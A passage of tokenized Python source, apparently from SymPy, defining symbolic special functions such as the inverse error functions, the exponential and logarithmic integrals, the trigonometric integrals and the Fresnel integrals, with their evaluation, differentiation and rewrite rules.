, - z ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> def as_real_imag ( self , deep = True , ** hints ) : <EOL> if self . args [ <NUM_LIT:0> ] . is_real : <EOL> if deep : <EOL> hints [ '<STR_LIT>' ] = False <EOL> return ( self . expand ( deep , ** hints ) , S . Zero ) <EOL> else : <EOL> return ( self , S . Zero ) <EOL> if deep : <EOL> x , y = self . args [ <NUM_LIT:0> ] . expand ( deep , ** hints ) . as_real_imag ( ) <EOL> else : <EOL> x , y = self . args [ <NUM_LIT:0> ] . as_real_imag ( ) <EOL> sq = - y ** <NUM_LIT:2> / x ** <NUM_LIT:2> <EOL> re = S . Half * ( self . func ( x + x * sqrt ( sq ) ) + self . func ( x - x * sqrt ( sq ) ) ) <EOL> im = x / ( <NUM_LIT:2> * y ) * sqrt ( sq ) * ( self . func ( x - x * sqrt ( sq ) ) - <EOL> self . func ( x + x * sqrt ( sq ) ) ) <EOL> return ( re , im ) <EOL> class erf2 ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> def fdiff ( self , argindex ) : <EOL> x , y = self . args <EOL> if argindex == <NUM_LIT:1> : <EOL> return - <NUM_LIT:2> * exp ( - x ** <NUM_LIT:2> ) / sqrt ( S . 
Pi ) <EOL> elif argindex == <NUM_LIT:2> : <EOL> return <NUM_LIT:2> * exp ( - y ** <NUM_LIT:2> ) / sqrt ( S . Pi ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> @ classmethod <EOL> def eval ( cls , x , y ) : <EOL> I = S . Infinity <EOL> N = S . NegativeInfinity <EOL> O = S . Zero <EOL> if x is S . NaN or y is S . NaN : <EOL> return S . NaN <EOL> elif x == y : <EOL> return S . Zero <EOL> elif ( x is I or x is N or x is O ) or ( y is I or y is N or y is O ) : <EOL> return erf ( y ) - erf ( x ) <EOL> if y . func is erf2inv and y . args [ <NUM_LIT:0> ] == x : <EOL> return y . args [ <NUM_LIT:1> ] <EOL> sign_x = x . could_extract_minus_sign ( ) <EOL> sign_y = y . could_extract_minus_sign ( ) <EOL> if ( sign_x and sign_y ) : <EOL> return - cls ( - x , - y ) <EOL> elif ( sign_x or sign_y ) : <EOL> return erf ( y ) - erf ( x ) <EOL> def _eval_conjugate ( self ) : <EOL> return self . func ( self . args [ <NUM_LIT:0> ] . conjugate ( ) , self . args [ <NUM_LIT:1> ] . conjugate ( ) ) <EOL> def _eval_is_real ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] . is_real and self . args [ <NUM_LIT:1> ] . is_real <EOL> def _eval_rewrite_as_erf ( self , x , y ) : <EOL> return erf ( y ) - erf ( x ) <EOL> def _eval_rewrite_as_erfc ( self , x , y ) : <EOL> return erfc ( x ) - erfc ( y ) <EOL> def _eval_rewrite_as_erfi ( self , x , y ) : <EOL> return I * ( erfi ( I * x ) - erfi ( I * y ) ) <EOL> def _eval_rewrite_as_fresnels ( self , x , y ) : <EOL> return erf ( y ) . rewrite ( fresnels ) - erf ( x ) . rewrite ( fresnels ) <EOL> def _eval_rewrite_as_fresnelc ( self , x , y ) : <EOL> return erf ( y ) . rewrite ( fresnelc ) - erf ( x ) . rewrite ( fresnelc ) <EOL> def _eval_rewrite_as_meijerg ( self , x , y ) : <EOL> return erf ( y ) . rewrite ( meijerg ) - erf ( x ) . rewrite ( meijerg ) <EOL> def _eval_rewrite_as_hyper ( self , x , y ) : <EOL> return erf ( y ) . rewrite ( hyper ) - erf ( x ) . 
rewrite ( hyper ) <EOL> def _eval_rewrite_as_uppergamma ( self , x , y ) : <EOL> from sympy import uppergamma <EOL> return ( sqrt ( y ** <NUM_LIT:2> ) / y * ( S . One - uppergamma ( S . Half , y ** <NUM_LIT:2> ) / sqrt ( S . Pi ) ) - <EOL> sqrt ( x ** <NUM_LIT:2> ) / x * ( S . One - uppergamma ( S . Half , x ** <NUM_LIT:2> ) / sqrt ( S . Pi ) ) ) <EOL> def _eval_rewrite_as_expint ( self , x , y ) : <EOL> return erf ( y ) . rewrite ( expint ) - erf ( x ) . rewrite ( expint ) <EOL> class erfinv ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> return sqrt ( S . Pi ) * exp ( self . func ( self . args [ <NUM_LIT:0> ] ) ** <NUM_LIT:2> ) * S . Half <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def inverse ( self , argindex = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> return erf <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z is S . NaN : <EOL> return S . NaN <EOL> elif z is S . NegativeOne : <EOL> return S . NegativeInfinity <EOL> elif z is S . Zero : <EOL> return S . Zero <EOL> elif z is S . One : <EOL> return S . Infinity <EOL> if ( z . func is erf ) and z . args [ <NUM_LIT:0> ] . is_real : <EOL> return z . args [ <NUM_LIT:0> ] <EOL> nz = z . extract_multiplicatively ( - <NUM_LIT:1> ) <EOL> if nz is not None and ( ( nz . func is erf ) and ( nz . args [ <NUM_LIT:0> ] ) . is_real ) : <EOL> return - nz . args [ <NUM_LIT:0> ] <EOL> def _eval_rewrite_as_erfcinv ( self , z ) : <EOL> return erfcinv ( <NUM_LIT:1> - z ) <EOL> class erfcinv ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> return - sqrt ( S . Pi ) * exp ( self . func ( self . args [ <NUM_LIT:0> ] ) ** <NUM_LIT:2> ) * S . 
Half <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def inverse ( self , argindex = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> return erfc <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z is S . NaN : <EOL> return S . NaN <EOL> elif z is S . Zero : <EOL> return S . Infinity <EOL> elif z is S . One : <EOL> return S . Zero <EOL> elif z == <NUM_LIT:2> : <EOL> return S . NegativeInfinity <EOL> def _eval_rewrite_as_erfinv ( self , z ) : <EOL> return erfinv ( <NUM_LIT:1> - z ) <EOL> class erf2inv ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> def fdiff ( self , argindex ) : <EOL> x , y = self . args <EOL> if argindex == <NUM_LIT:1> : <EOL> return exp ( self . func ( x , y ) ** <NUM_LIT:2> - x ** <NUM_LIT:2> ) <EOL> elif argindex == <NUM_LIT:2> : <EOL> return sqrt ( S . Pi ) * S . Half * exp ( self . func ( x , y ) ** <NUM_LIT:2> ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> @ classmethod <EOL> def eval ( cls , x , y ) : <EOL> if x is S . NaN or y is S . NaN : <EOL> return S . NaN <EOL> elif x is S . Zero and y is S . Zero : <EOL> return S . Zero <EOL> elif x is S . Zero and y is S . One : <EOL> return S . Infinity <EOL> elif x is S . One and y is S . Zero : <EOL> return S . One <EOL> elif x is S . Zero : <EOL> return erfinv ( y ) <EOL> elif x is S . Infinity : <EOL> return erfcinv ( - y ) <EOL> elif y is S . Zero : <EOL> return x <EOL> elif y is S . Infinity : <EOL> return erfinv ( x ) <EOL> class Ei ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if not z . is_polar and z . is_negative : <EOL> return Ei ( polar_lift ( z ) ) - pi * I <EOL> nz , n = z . extract_branch_factor ( ) <EOL> if n : <EOL> return Ei ( nz ) + <NUM_LIT:2> * I * pi * n <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> from sympy import unpolarify <EOL> arg = unpolarify ( self . 
args [ <NUM_LIT:0> ] ) <EOL> if argindex == <NUM_LIT:1> : <EOL> return exp ( arg ) / arg <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_evalf ( self , prec ) : <EOL> if ( self . args [ <NUM_LIT:0> ] / polar_lift ( - <NUM_LIT:1> ) ) . is_positive : <EOL> return Function . _eval_evalf ( self , prec ) + ( I * pi ) . _eval_evalf ( prec ) <EOL> return Function . _eval_evalf ( self , prec ) <EOL> def _eval_rewrite_as_uppergamma ( self , z ) : <EOL> from sympy import uppergamma <EOL> return - uppergamma ( <NUM_LIT:0> , polar_lift ( - <NUM_LIT:1> ) * z ) - I * pi <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> return - expint ( <NUM_LIT:1> , polar_lift ( - <NUM_LIT:1> ) * z ) - I * pi <EOL> def _eval_rewrite_as_li ( self , z ) : <EOL> if isinstance ( z , log ) : <EOL> return li ( z . args [ <NUM_LIT:0> ] ) <EOL> return li ( exp ( z ) ) <EOL> def _eval_rewrite_as_Si ( self , z ) : <EOL> return Shi ( z ) + Chi ( z ) <EOL> _eval_rewrite_as_Ci = _eval_rewrite_as_Si <EOL> _eval_rewrite_as_Chi = _eval_rewrite_as_Si <EOL> _eval_rewrite_as_Shi = _eval_rewrite_as_Si <EOL> def _eval_rewrite_as_tractable ( self , z ) : <EOL> return exp ( z ) * _eis ( z ) <EOL> def _eval_nseries ( self , x , n , logx ) : <EOL> x0 = self . args [ <NUM_LIT:0> ] . limit ( x , <NUM_LIT:0> ) <EOL> if x0 is S . Zero : <EOL> f = self . _eval_rewrite_as_Si ( * self . args ) <EOL> return f . _eval_nseries ( x , n , logx ) <EOL> return super ( Ei , self ) . _eval_nseries ( x , n , logx ) <EOL> class expint ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , nu , z ) : <EOL> from sympy import ( unpolarify , expand_mul , uppergamma , exp , gamma , <EOL> factorial ) <EOL> nu2 = unpolarify ( nu ) <EOL> if nu != nu2 : <EOL> return expint ( nu2 , z ) <EOL> if nu . is_Integer and nu <= <NUM_LIT:0> or ( not nu . is_Integer and ( <NUM_LIT:2> * nu ) . 
is_Integer ) : <EOL> return unpolarify ( expand_mul ( z ** ( nu - <NUM_LIT:1> ) * uppergamma ( <NUM_LIT:1> - nu , z ) ) ) <EOL> z , n = z . extract_branch_factor ( ) <EOL> if n == <NUM_LIT:0> : <EOL> return <EOL> if nu . is_integer : <EOL> if ( nu > <NUM_LIT:0> ) != True : <EOL> return <EOL> return expint ( nu , z ) - <NUM_LIT:2> * pi * I * n * ( - <NUM_LIT:1> ) ** ( nu - <NUM_LIT:1> ) / factorial ( nu - <NUM_LIT:1> ) * unpolarify ( z ) ** ( nu - <NUM_LIT:1> ) <EOL> else : <EOL> return ( exp ( <NUM_LIT:2> * I * pi * nu * n ) - <NUM_LIT:1> ) * z ** ( nu - <NUM_LIT:1> ) * gamma ( <NUM_LIT:1> - nu ) + expint ( nu , z ) <EOL> def fdiff ( self , argindex ) : <EOL> from sympy import meijerg <EOL> nu , z = self . args <EOL> if argindex == <NUM_LIT:1> : <EOL> return - z ** ( nu - <NUM_LIT:1> ) * meijerg ( [ ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> - nu ] , [ ] , z ) <EOL> elif argindex == <NUM_LIT:2> : <EOL> return - expint ( nu - <NUM_LIT:1> , z ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_rewrite_as_uppergamma ( self , nu , z ) : <EOL> from sympy import uppergamma <EOL> return z ** ( nu - <NUM_LIT:1> ) * uppergamma ( <NUM_LIT:1> - nu , z ) <EOL> def _eval_rewrite_as_Ei ( self , nu , z ) : <EOL> from sympy import exp_polar , unpolarify , exp , factorial <EOL> if nu == <NUM_LIT:1> : <EOL> return - Ei ( z * exp_polar ( - I * pi ) ) - I * pi <EOL> elif nu . is_Integer and nu > <NUM_LIT:1> : <EOL> x = - unpolarify ( z ) <EOL> return x ** ( nu - <NUM_LIT:1> ) / factorial ( nu - <NUM_LIT:1> ) * E1 ( z ) . rewrite ( Ei ) + exp ( x ) / factorial ( nu - <NUM_LIT:1> ) * Add ( * [ factorial ( nu - k - <NUM_LIT:2> ) * x ** k for k in range ( nu - <NUM_LIT:1> ) ] ) <EOL> else : <EOL> return self <EOL> def _eval_expand_func ( self , ** hints ) : <EOL> return self . rewrite ( Ei ) . 
rewrite ( expint , ** hints ) <EOL> def _eval_rewrite_as_Si ( self , nu , z ) : <EOL> if nu != <NUM_LIT:1> : <EOL> return self <EOL> return Shi ( z ) - Chi ( z ) <EOL> _eval_rewrite_as_Ci = _eval_rewrite_as_Si <EOL> _eval_rewrite_as_Chi = _eval_rewrite_as_Si <EOL> _eval_rewrite_as_Shi = _eval_rewrite_as_Si <EOL> def _eval_nseries ( self , x , n , logx ) : <EOL> if not self . args [ <NUM_LIT:0> ] . has ( x ) : <EOL> nu = self . args [ <NUM_LIT:0> ] <EOL> if nu == <NUM_LIT:1> : <EOL> f = self . _eval_rewrite_as_Si ( * self . args ) <EOL> return f . _eval_nseries ( x , n , logx ) <EOL> elif nu . is_Integer and nu > <NUM_LIT:1> : <EOL> f = self . _eval_rewrite_as_Ei ( * self . args ) <EOL> return f . _eval_nseries ( x , n , logx ) <EOL> return super ( expint , self ) . _eval_nseries ( x , n , logx ) <EOL> def _sage_ ( self ) : <EOL> import sage . all as sage <EOL> return sage . exp_integral_e ( self . args [ <NUM_LIT:0> ] . _sage_ ( ) , self . args [ <NUM_LIT:1> ] . _sage_ ( ) ) <EOL> def E1 ( z ) : <EOL> """<STR_LIT>""" <EOL> return expint ( <NUM_LIT:1> , z ) <EOL> class li ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z is S . Zero : <EOL> return S . Zero <EOL> elif z is S . One : <EOL> return S . NegativeInfinity <EOL> elif z is S . Infinity : <EOL> return S . Infinity <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> arg = self . args [ <NUM_LIT:0> ] <EOL> if argindex == <NUM_LIT:1> : <EOL> return S . One / log ( arg ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_conjugate ( self ) : <EOL> z = self . args [ <NUM_LIT:0> ] <EOL> if not ( z . is_real and z . is_negative ) : <EOL> return self . func ( z . 
conjugate ( ) ) <EOL> def _eval_rewrite_as_Li ( self , z ) : <EOL> return Li ( z ) + li ( <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_Ei ( self , z ) : <EOL> return Ei ( log ( z ) ) <EOL> def _eval_rewrite_as_uppergamma ( self , z ) : <EOL> from sympy import uppergamma <EOL> return ( - uppergamma ( <NUM_LIT:0> , - log ( z ) ) + <EOL> S . Half * ( log ( log ( z ) ) - log ( S . One / log ( z ) ) ) - log ( - log ( z ) ) ) <EOL> def _eval_rewrite_as_Si ( self , z ) : <EOL> return ( Ci ( I * log ( z ) ) - I * Si ( I * log ( z ) ) - <EOL> S . Half * ( log ( S . One / log ( z ) ) - log ( log ( z ) ) ) - log ( I * log ( z ) ) ) <EOL> _eval_rewrite_as_Ci = _eval_rewrite_as_Si <EOL> def _eval_rewrite_as_Shi ( self , z ) : <EOL> return ( Chi ( log ( z ) ) - Shi ( log ( z ) ) - S . Half * ( log ( S . One / log ( z ) ) - log ( log ( z ) ) ) ) <EOL> _eval_rewrite_as_Chi = _eval_rewrite_as_Shi <EOL> def _eval_rewrite_as_hyper ( self , z ) : <EOL> return ( log ( z ) * hyper ( ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) , log ( z ) ) + <EOL> S . Half * ( log ( log ( z ) ) - log ( S . One / log ( z ) ) ) + S . EulerGamma ) <EOL> def _eval_rewrite_as_meijerg ( self , z ) : <EOL> return ( - log ( - log ( z ) ) - S . Half * ( log ( S . One / log ( z ) ) - log ( log ( z ) ) ) <EOL> - meijerg ( ( ( ) , ( <NUM_LIT:1> , ) ) , ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( ) ) , - log ( z ) ) ) <EOL> def _eval_rewrite_as_tractable ( self , z ) : <EOL> return z * _eis ( log ( z ) ) <EOL> class Li ( Function ) : <EOL> r"""<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z is S . Infinity : <EOL> return S . Infinity <EOL> elif z is <NUM_LIT:2> * S . One : <EOL> return S . Zero <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> arg = self . args [ <NUM_LIT:0> ] <EOL> if argindex == <NUM_LIT:1> : <EOL> return S . One / log ( arg ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_evalf ( self , prec ) : <EOL> return self . 
rewrite ( li ) . evalf ( prec ) <EOL> def _eval_rewrite_as_li ( self , z ) : <EOL> return li ( z ) - li ( <NUM_LIT:2> ) <EOL> def _eval_rewrite_as_tractable ( self , z ) : <EOL> return self . rewrite ( li ) . rewrite ( "<STR_LIT>" , deep = True ) <EOL> class TrigonometricIntegral ( Function ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z == <NUM_LIT:0> : <EOL> return cls . _atzero <EOL> elif z is S . Infinity : <EOL> return cls . _atinf ( ) <EOL> elif z is S . NegativeInfinity : <EOL> return cls . _atneginf ( ) <EOL> nz = z . extract_multiplicatively ( polar_lift ( I ) ) <EOL> if nz is None and cls . _trigfunc ( <NUM_LIT:0> ) == <NUM_LIT:0> : <EOL> nz = z . extract_multiplicatively ( I ) <EOL> if nz is not None : <EOL> return cls . _Ifactor ( nz , <NUM_LIT:1> ) <EOL> nz = z . extract_multiplicatively ( polar_lift ( - I ) ) <EOL> if nz is not None : <EOL> return cls . _Ifactor ( nz , - <NUM_LIT:1> ) <EOL> nz = z . extract_multiplicatively ( polar_lift ( - <NUM_LIT:1> ) ) <EOL> if nz is None and cls . _trigfunc ( <NUM_LIT:0> ) == <NUM_LIT:0> : <EOL> nz = z . extract_multiplicatively ( - <NUM_LIT:1> ) <EOL> if nz is not None : <EOL> return cls . _minusfactor ( nz ) <EOL> nz , n = z . extract_branch_factor ( ) <EOL> if n == <NUM_LIT:0> and nz == z : <EOL> return <EOL> return <NUM_LIT:2> * pi * I * n * cls . _trigfunc ( <NUM_LIT:0> ) + cls ( nz ) <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> from sympy import unpolarify <EOL> arg = unpolarify ( self . args [ <NUM_LIT:0> ] ) <EOL> if argindex == <NUM_LIT:1> : <EOL> return self . _trigfunc ( arg ) / arg <EOL> def _eval_rewrite_as_Ei ( self , z ) : <EOL> return self . _eval_rewrite_as_expint ( z ) . rewrite ( Ei ) <EOL> def _eval_rewrite_as_uppergamma ( self , z ) : <EOL> from sympy import uppergamma <EOL> return self . _eval_rewrite_as_expint ( z ) . 
rewrite ( uppergamma ) <EOL> def _eval_nseries ( self , x , n , logx ) : <EOL> from sympy import log , EulerGamma , Pow <EOL> n += <NUM_LIT:1> <EOL> if self . args [ <NUM_LIT:0> ] . subs ( x , <NUM_LIT:0> ) != <NUM_LIT:0> : <EOL> return super ( TrigonometricIntegral , self ) . _eval_nseries ( x , n , logx ) <EOL> baseseries = self . _trigfunc ( x ) . _eval_nseries ( x , n , logx ) <EOL> if self . _trigfunc ( <NUM_LIT:0> ) != <NUM_LIT:0> : <EOL> baseseries -= <NUM_LIT:1> <EOL> baseseries = baseseries . replace ( Pow , lambda t , n : t ** n / n , simultaneous = False ) <EOL> if self . _trigfunc ( <NUM_LIT:0> ) != <NUM_LIT:0> : <EOL> baseseries += EulerGamma + log ( x ) <EOL> return baseseries . subs ( x , self . args [ <NUM_LIT:0> ] ) . _eval_nseries ( x , n , logx ) <EOL> class Si ( TrigonometricIntegral ) : <EOL> r"""<STR_LIT>""" <EOL> _trigfunc = sin <EOL> _atzero = S ( <NUM_LIT:0> ) <EOL> @ classmethod <EOL> def _atinf ( cls ) : <EOL> return pi * S . Half <EOL> @ classmethod <EOL> def _atneginf ( cls ) : <EOL> return - pi * S . Half <EOL> @ classmethod <EOL> def _minusfactor ( cls , z ) : <EOL> return - Si ( z ) <EOL> @ classmethod <EOL> def _Ifactor ( cls , z , sign ) : <EOL> return I * Shi ( z ) * sign <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> return pi / <NUM_LIT:2> + ( E1 ( polar_lift ( I ) * z ) - E1 ( polar_lift ( - I ) * z ) ) / <NUM_LIT:2> / I <EOL> def _eval_rewrite_as_sinc ( self , z ) : <EOL> from sympy import Integral <EOL> t = Symbol ( '<STR_LIT:t>' , Dummy = True ) <EOL> return Integral ( sinc ( t ) , ( t , <NUM_LIT:0> , z ) ) <EOL> def _sage_ ( self ) : <EOL> import sage . all as sage <EOL> return sage . sin_integral ( self . args [ <NUM_LIT:0> ] . _sage_ ( ) ) <EOL> class Ci ( TrigonometricIntegral ) : <EOL> r"""<STR_LIT>""" <EOL> _trigfunc = cos <EOL> _atzero = S . ComplexInfinity <EOL> @ classmethod <EOL> def _atinf ( cls ) : <EOL> return S . 
Zero <EOL> @ classmethod <EOL> def _atneginf ( cls ) : <EOL> return I * pi <EOL> @ classmethod <EOL> def _minusfactor ( cls , z ) : <EOL> return Ci ( z ) + I * pi <EOL> @ classmethod <EOL> def _Ifactor ( cls , z , sign ) : <EOL> return Chi ( z ) + I * pi / <NUM_LIT:2> * sign <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> return - ( E1 ( polar_lift ( I ) * z ) + E1 ( polar_lift ( - I ) * z ) ) / <NUM_LIT:2> <EOL> def _sage_ ( self ) : <EOL> import sage . all as sage <EOL> return sage . cos_integral ( self . args [ <NUM_LIT:0> ] . _sage_ ( ) ) <EOL> class Shi ( TrigonometricIntegral ) : <EOL> r"""<STR_LIT>""" <EOL> _trigfunc = sinh <EOL> _atzero = S ( <NUM_LIT:0> ) <EOL> @ classmethod <EOL> def _atinf ( cls ) : <EOL> return S . Infinity <EOL> @ classmethod <EOL> def _atneginf ( cls ) : <EOL> return S . NegativeInfinity <EOL> @ classmethod <EOL> def _minusfactor ( cls , z ) : <EOL> return - Shi ( z ) <EOL> @ classmethod <EOL> def _Ifactor ( cls , z , sign ) : <EOL> return I * Si ( z ) * sign <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> from sympy import exp_polar <EOL> return ( E1 ( z ) - E1 ( exp_polar ( I * pi ) * z ) ) / <NUM_LIT:2> - I * pi / <NUM_LIT:2> <EOL> def _sage_ ( self ) : <EOL> import sage . all as sage <EOL> return sage . sinh_integral ( self . args [ <NUM_LIT:0> ] . _sage_ ( ) ) <EOL> class Chi ( TrigonometricIntegral ) : <EOL> r"""<STR_LIT>""" <EOL> _trigfunc = cosh <EOL> _atzero = S . ComplexInfinity <EOL> @ classmethod <EOL> def _atinf ( cls ) : <EOL> return S . Infinity <EOL> @ classmethod <EOL> def _atneginf ( cls ) : <EOL> return S . 
Infinity <EOL> @ classmethod <EOL> def _minusfactor ( cls , z ) : <EOL> return Chi ( z ) + I * pi <EOL> @ classmethod <EOL> def _Ifactor ( cls , z , sign ) : <EOL> return Ci ( z ) + I * pi / <NUM_LIT:2> * sign <EOL> def _eval_rewrite_as_expint ( self , z ) : <EOL> from sympy import exp_polar <EOL> return - I * pi / <NUM_LIT:2> - ( E1 ( z ) + E1 ( exp_polar ( I * pi ) * z ) ) / <NUM_LIT:2> <EOL> def _latex ( self , printer , exp = None ) : <EOL> if len ( self . args ) != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if exp : <EOL> return r'<STR_LIT>' % ( printer . _print ( exp ) , printer . _print ( self . args [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> return r'<STR_LIT>' % printer . _print ( self . args [ <NUM_LIT:0> ] ) <EOL> @ staticmethod <EOL> def _latex_no_arg ( printer ) : <EOL> return r'<STR_LIT>' <EOL> def _sage_ ( self ) : <EOL> import sage . all as sage <EOL> return sage . cosh_integral ( self . args [ <NUM_LIT:0> ] . _sage_ ( ) ) <EOL> class FresnelIntegral ( Function ) : <EOL> """<STR_LIT>""" <EOL> unbranched = True <EOL> @ classmethod <EOL> def eval ( cls , z ) : <EOL> if z is S . Zero : <EOL> return S ( <NUM_LIT:0> ) <EOL> prefact = S . One <EOL> newarg = z <EOL> changed = False <EOL> nz = newarg . extract_multiplicatively ( - <NUM_LIT:1> ) <EOL> if nz is not None : <EOL> prefact = - prefact <EOL> newarg = nz <EOL> changed = True <EOL> nz = newarg . extract_multiplicatively ( I ) <EOL> if nz is not None : <EOL> prefact = cls . _sign * I * prefact <EOL> newarg = nz <EOL> changed = True <EOL> if changed : <EOL> return prefact * cls ( newarg ) <EOL> if z is S . Infinity : <EOL> return S . Half <EOL> elif z is I * S . Infinity : <EOL> return cls . _sign * I * S . Half <EOL> def fdiff ( self , argindex = <NUM_LIT:1> ) : <EOL> if argindex == <NUM_LIT:1> : <EOL> return self . _trigfunc ( S . Half * pi * self . 
args [ <NUM_LIT:0> ] ** <NUM_LIT:2> ) <EOL> else : <EOL> raise ArgumentIndexError ( self , argindex ) <EOL> def _eval_is_real ( self ) : <EOL> return self . args [ <NUM_LIT:0> ] . is_real <EOL> def _eval_conjugate ( self ) : <EOL> return self . func ( self . args [ <NUM_LIT:0> ] . conjugate ( ) ) <EOL> def _as_real_imag ( self , deep = True , ** hints ) : <EOL> if self . args [ <NUM_LIT:0> ] . is_real : <EOL> if deep : <EOL> hints [ '<STR_LIT>' ] = False <EOL> return ( self . expand ( deep , ** hints ) , S . Zero ) <EOL> else : <EOL> return ( self , S . Zero ) <EOL> if deep : <EOL> re , im = self . args [ <NUM_LIT:0> ] . expand ( deep , ** hints ) . as_real_imag ( ) <EOL> else : <EOL> re , im = self . args [ <NUM_LIT:0> ] . as_real_imag ( ) <EOL> return ( re , im ) <EOL> def as_real_imag ( self , deep = True , ** hints ) : <EOL> x , y = self . _as_real_imag ( deep = deep , ** hints ) <EOL> sq = - y ** <NUM_LIT:2> / x ** <NUM_LIT:2> <EOL> re = S . Half * ( self . func ( x + x * sqrt ( sq ) ) + self . func ( x - x * sqrt ( sq ) ) ) <EOL> im = x / ( <NUM_LIT:2> * y ) * sqrt ( sq ) * ( self . func ( x - x * sqrt ( sq ) ) - <EOL> self . func ( x + x * sqrt ( sq ) ) ) <EOL> return ( re , im ) <EOL> class fresnels ( FresnelIntegral ) : <EOL> r"""<STR_LIT>""" <EOL> _trigfunc = sin <EOL> _sign = - S . One <EOL> @ staticmethod <EOL> @ cacheit <EOL> def taylor_term ( n , x , * previous_terms ) : <EOL> if n < <NUM_LIT:0> : <EOL> return S . 
Zero <EOL> else : <EOL> x = sympify ( x ) <EOL> if len ( previous_terms ) > <NUM_LIT:1> : <EOL> p = previous_terms [ - <NUM_LIT:1> ] <EOL> return ( - pi ** <NUM_LIT:2> * x ** <NUM_LIT:4> * ( <NUM_LIT:4> * n - <NUM_LIT:1> ) / ( <NUM_LIT:8> * n * ( <NUM_LIT:2> * n + <NUM_LIT:1> ) * ( <NUM_LIT:4> * n + <NUM_LIT:3> ) ) ) * p <EOL> else : <EOL> return x ** <NUM_LIT:3> * ( - x ** <NUM_LIT:4> ) ** n * ( S ( <NUM_LIT:2> ) ** ( - <NUM_LIT:2> * n - <NUM_LIT:1> ) * pi ** ( <NUM_LIT:2> * n + <NUM_LIT:1> ) ) / ( ( <NUM_LIT:4> * n + <NUM_LIT:3> ) * factorial ( <NUM_LIT:2> * n + <NUM_LIT:1> ) ) <EOL> def _eval_rewrite_as_erf ( self , z ) : <EOL> return ( S . One + I ) / <NUM_LIT:4> * ( erf ( ( S . One + I ) / <NUM_LIT:2> * sqrt ( pi ) * z ) - I * erf ( ( S . One - I ) / <NUM_LIT:2> * sqrt ( pi ) * z ) ) <EOL> def _eval_rewrite_as_hyper ( self , z ) : <EOL> return pi * z ** <NUM_LIT:3> / <NUM_LIT:6> * hyper ( [ S ( <NUM_LIT:3> ) / <NUM_LIT:4> ] , [ S ( <NUM_LIT:3> ) / <NUM_LIT:2> , S ( <NUM_LIT:7> ) / <NUM_LIT:4> ] , - pi ** <NUM_LIT:2> * z ** <NUM_LIT:4> / <NUM_LIT:16> ) <EOL> def _eval_rewrite_as_meijerg ( self , z ) : <EOL> return ( pi * z ** ( S ( <NUM_LIT:9> ) / <NUM_LIT:4> ) / ( sqrt ( <NUM_LIT:2> ) * ( z ** <NUM_LIT:2> ) ** ( S ( <NUM_LIT:3> ) / <NUM_LIT:4> ) * ( - z ) ** ( S ( <NUM_LIT:3> ) / <NUM_LIT:4> ) ) <EOL> * meijerg ( [ ] , [ <NUM_LIT:1> ] , [ S ( <NUM_LIT:3> ) / <NUM_LIT:4> ] , [ S ( <NUM_LIT:1> ) / <NUM_LIT:4> , <NUM_LIT:0> ] , - pi ** <NUM_LIT:2> * z ** <NUM_LIT:4> / <NUM_LIT:16> ) ) <EOL> def _eval_aseries ( self , n , args0 , x , logx ) : <EOL> from sympy import Order <EOL> point = args0 [ <NUM_LIT:0> ] <EOL> if point is S . Infinity : <EOL> z = self . 
